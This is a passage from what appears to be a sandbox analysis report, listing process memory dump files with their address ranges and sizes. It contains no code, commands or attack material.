                                                                                                                                                                                                                                                                                                                                      • memory/4064-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/4064-278-0x0000000005D50000-0x0000000005D51000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4064-244-0x0000000001080000-0x0000000001081000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4064-273-0x0000000005E70000-0x0000000005E71000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4064-268-0x0000000005CE0000-0x0000000005CE1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4064-264-0x0000000006370000-0x0000000006371000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4064-296-0x0000000005DA0000-0x0000000005DA1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4064-233-0x0000000077B30000-0x0000000077CBE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        1.6MB

                                                                                                                                                                                                                                                                                                                                      • memory/4104-340-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/4280-279-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/4312-320-0x00000211CD650000-0x00000211CD6BE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        440KB

                                                                                                                                                                                                                                                                                                                                      • memory/4312-323-0x00000211CD6C0000-0x00000211CD78F000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        828KB

                                                                                                                                                                                                                                                                                                                                      • memory/4312-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/4332-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/4332-219-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        80KB

                                                                                                                                                                                                                                                                                                                                      • memory/4344-261-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        12KB

                                                                                                                                                                                                                                                                                                                                      • memory/4344-202-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/4388-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/4424-309-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                                                                                      • memory/4424-326-0x0000000005470000-0x0000000005A76000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        6.0MB

                                                                                                                                                                                                                                                                                                                                      • memory/4424-311-0x000000000041A616-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/4492-449-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/4556-370-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/4588-329-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/4608-266-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-243-0x0000000003920000-0x000000000395C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        240KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-304-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-306-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-307-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/4608-249-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-254-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-316-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-312-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-269-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-240-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-255-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-287-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-272-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-300-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-310-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-252-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-297-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-305-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4608-308-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                      • memory/4620-432-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/4628-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/4692-376-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/5024-292-0x000000000041A76A-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/5024-288-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                                                                                      • memory/5040-263-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/5076-446-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/5088-336-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/5148-428-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/5228-443-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/5232-442-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/5396-399-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/5412-451-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/5428-441-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/5556-402-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/5680-407-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/5776-408-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/5968-410-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/6000-413-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/6060-418-0x00007FF691ED4060-mapping.dmp
                                                                                                                                                                                                                                                                                                                                      • memory/6120-423-0x0000000000000000-mapping.dmp